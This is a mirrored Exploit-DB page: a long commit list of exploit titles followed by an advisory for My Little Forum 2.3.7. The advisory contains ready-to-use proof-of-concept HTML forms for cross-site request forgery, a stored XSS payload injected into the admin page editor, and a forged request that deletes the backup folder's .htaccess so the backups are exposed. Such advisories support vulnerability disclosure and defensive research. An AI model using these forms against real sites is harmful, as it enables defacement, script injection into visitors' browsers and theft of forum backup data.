bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions 1
exploit-db-mirror/platforms/php/webapps/40676.txt
Offensive Security c76e893f94 DB: 2016-11-02 
12 new exploits

KarjaSoft Sami FTP Server 2.0.2 - (USER/PASS) Remote Buffer Overflow (PoC)
KarjaSoft Sami FTP Server 2.0.2 - USER/PASS Remote Buffer Overflow (PoC)

KarjaSoft Sami FTP Server 2.0.2 - (USER/PASS) Remote Buffer Overflow
KarjaSoft Sami FTP Server 2.0.2 - USER/PASS Remote Buffer Overflow

Apple iOS 4.0.3 - DPAP Server Denial of Service

KarjaSoft Sami FTP Server 2.02 - USER Overflow (Metasploit)
KarjaSoft Sami FTP Server 2.0.2 - USER Remote Buffer Overflow (Metasploit)

Freefloat FTP Server - (LIST command) Buffer Overflow
Freefloat FTP Server - 'LIST' Command Buffer Overflow
Freefloat FTP Server 1.00 - MKD Buffer Overflow
Freefloat FTP Server - MKD Buffer Overflow (Metasploit)
Freefloat FTP Server 1.0 - 'MKD' Buffer Overflow
Freefloat FTP Server - 'MKD' Buffer Overflow (Metasploit)

Freefloat FTP Server 1.0 - REST & PASV Buffer Overflow
Freefloat FTP Server 1.0 - 'REST' / 'PASV' Buffer Overflow

Freefloat FTP Server - REST Buffer Overflow (Metasploit)
Freefloat FTP Server - 'REST' Buffer Overflow (Metasploit)

Freefloat FTP Server 1.0 - ACCL Buffer Overflow
Freefloat FTP Server 1.0 - 'ACCL' Buffer Overflow

Nagios Plugin check_ups - Local Buffer Overflow (PoC)
Nagios Plugins check_ups - Local Buffer Overflow (PoC)

Joomla! Component KISS Advertiser - Remote File / Bypass Upload
Joomla! Component 'com_ksadvertiser' - Remote File / Bypass Upload

Joomla! Component OS Property 2.0.2 - Unrestricted Arbitrary File Upload
Joomla! Component 'com_osproperty' 2.0.2 - Unrestricted Arbitrary File Upload

Joomla! Component com_niceajaxpoll 1.3.0 - SQL Injection
Joomla! Component 'com_niceajaxpoll' 1.3.0 - SQL Injection

Joomla! Extension Movm Extension (com_movm) - SQL Injection
Joomla! Component 'com_movm' - SQL Injection

Joomla! Component joomgalaxy 1.2.0.4 - Multiple Vulnerabilities
Joomla! Component 'com_joomgalaxy' 1.2.0.4 - Multiple Vulnerabilities

Joomla! Component En Masse 1.2.0.4 - SQL Injection
Joomla! Component 'com_enmasse' 1.2.0.4 - SQL Injection

Joomla! Component FireBoard (com_fireboard) - SQL Injection
Joomla! Component 'com_fireboard' - SQL Injection

Joomla! Component Spider Calendar Lite (com_spidercalendar) - SQL Injection
Joomla! Component 'com_spidercalendar' - SQL Injection

Joomla! Component RokModule - 'index.php module Parameter' Blind SQL Injection
Joomla! Component 'com_rokmodule' - 'module' Parameter Blind SQL Injection

Joomla! Component iCagenda - (id Parameter) Multiple Vulnerabilities
Joomla! Component 'com_icagenda' - 'id' Parameter Multiple Vulnerabilities
Joomla! Component FreeStyle Support com_fss 1.9.1.1447 - SQL Injection
Joomla! Component Tags - 'index.php tag Parameter' SQL Injection
Joomla! Component 'com_fss' 1.9.1.1447 - SQL Injection
Joomla! Component 'com_tag' - 'tag' Parameter SQL Injection
Joomla! Plugin Commedia - 'index.php task Parameter' SQL Injection
Joomla! Component Kunena - 'index.php search Parameter' SQL Injection
Joomla! Component 'com_commedia' - 'task' Parameter SQL Injection
Joomla! Component 'com_kunena' - 'search' Parameter SQL Injection

Freefloat FTP Server - PUT Command Buffer Overflow
Freefloat FTP Server - 'PUT' Command Buffer Overflow

Joomla! Component Spider Catalog - 'index.php Product_ID Parameter' SQL Injection
Joomla! Component 'com_spidercatalog' - 'Product_ID' Parameter SQL Injection

Free Float FTP Server - USER Command Buffer Overflow
Freefloat FTP Server - 'USER' Command Buffer Overflow

Joomla! Component JooProperty 1.13.0 - Multiple Vulnerabilities
Joomla! Component 'com_jooproperty' 1.13.0 - Multiple Vulnerabilities

Joomla! Component Spider Calendar - 'index.php date Parameter' Blind SQL Injection
Joomla! Component 'com_spidercalendar' - 'date' Parameter Blind SQL Injection

Joomla! Component com_collector - Arbitrary File Upload
Joomla! Component 'com_collector' - Arbitrary File Upload

Freefloat FTP 1.0 - Raw Commands Buffer Overflow
Freefloat FTP Server 1.0 - 'Raw' Commands Buffer Overflow

Joomla! 3.0.2 - (highlight.php) PHP Object Injection
Joomla! 3.0.2 - 'highlight.php' PHP Object Injection

Joomla! Component RSfiles - (cid parameter) SQL Injection
Joomla! Component 'com_rsfiles' - 'cid' Parameter SQL Injection

Joomla! Component CiviCRM 4.2.2 - Remote Code Injection
Joomla! Component 'com_civicrm' 4.2.2 - Remote Code Injection

Freefloat FTP 1.0 - DEP Bypass with ROP
Freefloat FTP Server 1.0 - DEP Bypass with ROP

Joomla! 3.0.3 - (remember.php) PHP Object Injection
Joomla! 3.0.3 - 'remember.php' PHP Object Injection

Joomla! Extension DJ Classifieds 2.0 - Blind SQL Injection
Joomla! Component 'dj-classifieds' 2.0 - Blind SQL Injection

Joomla! Component S5 Clan Roster com_s5clanroster - 'index.php id Parameter' SQL Injection
Joomla! Component 'com_s5clanroster' - 'id' Parameter SQL Injection

Joomla! Component Sectionex 2.5.96 - SQL Injection
Joomla! Component 'com_sectionex' 2.5.96 - SQL Injection

Joomla! Component redSHOP 1.2 - SQL Injection
Joomla! Component 'com_redshop' 1.2 - SQL Injection

Joomla! Component Media Manager - Arbitrary File Upload (Metasploit)
Joomla! Component 'com_media' - Arbitrary File Upload (Metasploit)

Apple iOS Mobile Safari - Memory Exhaustion Remote Denial of Service

check_dhcp - Nagios Plugins 2.0.1 - Arbitrary Option File Read
Nagios Plugins check_dhcp 2.0.1 - Arbitrary Option File Read

check_dhcp 2.0.2 (Nagios Plugins) - Arbitrary Option File Read Race Condition
Nagios Plugins check_dhcp 2.0.2 - Arbitrary Option File Read Race Condition

Apple iOS 4.0.2 - Networking Packet Filter Rules Privilege Escalation
Joomla! Component IDoEditor - 'image.php' Arbitrary File Upload
Joomla! Component jFancy - 'script.php' Arbitrary File Upload
Joomla! Component 'IDoEditor' - 'image.php' Arbitrary File Upload
Joomla! Component 'mod_jfancy' - 'script.php' Arbitrary File Upload

Joomla! Component hwdVideoShare - 'flash_upload.php' Arbitrary File Upload
Joomla! Component 'com_hwdvideoshare' - 'flash_upload.php' Arbitrary File Upload
Joomla! Component Maian Media - 'uploadhandler.php' Arbitrary File Upload
Joomla! Component JCal Pro Calendar - SQL Injection
Joomla! Component 'com_maianmedia' - 'uploadhandler.php' Arbitrary File Upload
Joomla! Component 'com_jcalpro' - SQL Injection

Joomla! Component com_szallasok - 'id' Parameter SQL Injection
Joomla! Component 'com_szallasok' - 'id' Parameter SQL Injection

Joomla! Module Language Switcher 2.5.x - Multiple Cross-Site Scripting Vulnerabilities
My Little Forum 2.3.7 - Multiple Vulnerabilities

Joomla! Component com_hello - 'Controller' Parameter Local File Inclusion
Joomla! Component 'com_hello' - 'Controller' Parameter Local File Inclusion

Joomla! Component Odudeprofile - 'profession' Parameter SQL Injection
Joomla! Component 'com_odudeprofile' - 'profession' Parameter SQL Injection

Joomla! Component com_photo - Multiple SQL Injections
Joomla! Component 'com_photo' - Multiple SQL Injections

Joomla! Component CiviCRM - Multiple Arbitrary File Upload Vulnerabilities
Joomla! Component 'com_civicrm' - Multiple Arbitrary File Upload Vulnerabilities

Joomla! Component Komento - 'cid' Parameter SQL Injection
Joomla! Component 'Komento' - 'cid' Parameter SQL Injection

Joomla! Component com_quiz - SQL Injection
Joomla! Component 'com_quiz' - SQL Injection

Joomla! Component com_parcoauto - 'idVeicolo' Parameter SQL Injection
Joomla! Component 'com_parcoauto' - 'idVeicolo' Parameter SQL Injection
Joomla! Component ZT Autolinks - 'Controller' Parameter Local File Inclusion
Joomla! Component Bit - 'Controller' Parameter Local File Inclusion
Joomla! Component 'com_ztautolink' - 'Controller' Parameter Local File Inclusion
Joomla! Component 'com_bit' - 'Controller' Parameter Local File Inclusion

Joomla! Component Incapsula - Multiple Cross-Site Scripting Vulnerabilities
Joomla! Component 'com_incapsula' - Multiple Cross-Site Scripting Vulnerabilities

Apple Mac OSX 10.9.5 / 10.10.5 - rsh/libmalloc Privilege Escalation
Apple Mac OSX 10.9.5/10.10.5 - rsh/libmalloc Privilege Escalation

Apple Mac OSX 10.9.5 / 10.10.5 - rsh/libmalloc Privilege Escalation (Metasploit)
Apple Mac OSX 10.9.5/10.10.5 - rsh/libmalloc Privilege Escalation (Metasploit)

Joomla! Component RokDownloads - Arbitrary File Upload
Joomla! Component 'com_rokdownloads' - Arbitrary File Upload

Apple Intel HD 3000 Graphics driver 10.0.0 - Privilege Escalation
Apple Intel HD 3000 Graphics Driver 10.0.0 - Privilege Escalation

MyLittleForum 2.3.5 - PHP Command Injection
My Little Forum 2.3.5 - PHP Command Injection
Apple OS X Kernel - IOBluetoothFamily.kext Use-After-Free
OS X/iOS Kernel - IOSurface Use-After-Free
OS X/iOS - mach_ports_register Multiple Memory Safety Issues
Apple OS X - Kernel IOBluetoothFamily.kext Use-After-Free
Apple OS X/iOS - Kernel IOSurface Use-After-Free
Apple OS X/iOS - mach_ports_register Multiple Memory Safety Issues

MacOS 10.12 - 'task_t' Privilege Escalation
Apple MacOS 10.12 - 'task_t' Privilege Escalation
Freefloat FTP Server 1.0 - 'ABOR' Command Buffer Overflow
School Registration and Fee System - Authentication Bypass
Freefloat FTP Server 1.0 - 'RMD' Command Buffer Overflow
Freefloat FTP Server 1.0 - 'HOST' Command Buffer Overflow
KarjaSoft Sami FTP Server 2.0.2 - USER/PASS Remote Buffer Overflow (SEH)
Freefloat FTP Server 1.0 - 'RENAME' Command Buffer Overflow
MySQL / MariaDB / PerconaDB - 'mysql' System User Privilege Escalation / Race Condition
MySQL / MariaDB / PerconaDB - 'root' Privilege Escalation
2016-11-02 05:01:19 +00:00

86 lines
2.5 KiB
Text
Executable file
Raw Blame History

Title:
======
My Little Forum 2.3.7 - Multiple Vulnerability
Product & Service Introduction:
===============================
My little forum is a simple PHP and MySQL based internet forum that
displays the messages in classical threaded view (tree structure). It is
Open Source licensed under the GNU General Public License. The main
claim of this web forum is simplicity. Furthermore it should be easy to
install and run on a standard server configuration with PHP and MySQL.
Software Link:
==============
https://github.com/ilosuna/mylittleforum/archive/master.zip
Vulnerability Type:
=========================
Cross-Site Request Forgery
Stored Cross-Site Scripting
CSRF Allow To Backup Disclosure
Vulnerability Details:
==============================
This WebApplication is vulnerable and suffer from some vulnerablity.
Severity Level:
===============
High
Proof of Concept (PoC):
=======================
1. CSRF (Add Page)
With this exploit can add page in webapp.
<form
action="http://localhost/mylittleforum-master/index.php?mode=admin&action=edit_page"
method="post" accept-charset="utf-8">
<input type="hidden" name="mode" value="admin">
<input type="hidden" name="title" value="Title">
<input type="hidden" name="content" value="Content">
<input type="hidden" name="menu_linkname" value="Name">
<input type="submit" name="edit_page_submit" value="OK - Save page">
</form>
2. Stored XSS:
<form
action="http://localhost/mylittleforum-master/index.php?mode=admin&action=edit_page"
method="post" accept-charset="utf-8">
<input type="hidden" name="mode" value="admin">
<input type="hidden" name="title" value="Stored XSS
<script>alert(1)</script>">
<input type="hidden" name="content" value="Stored XSS
<script>alert(2)</script>">
<input type="hidden" name="menu_linkname" value="Stored XSS
<script>alert(3)</script>">
<input type="submit" name="edit_page_submit" value="OK - Save page">
</form>
3. Backup Disclosure:
with this exploit we can delect htaccess in backup folder for access to
backups.
<form action="http://localhost/mylittleforum-master/index.php"
method="post" accept-charset="utf-8">
<div>
<input type="hidden" name="mode" value="admin">
<input type="hidden" name="delete_backup_files[]" value=".htaccess">
<input type="submit" name="delete_backup_files_confirm" value="OK -
Delete">
</div>
</form>
Next use exploit go to:
http://localhost/mylittleforum-master/backup/
Author:
==================
Ashiyane Digital Security Team
Reference in a new issue View git blame Copy permalink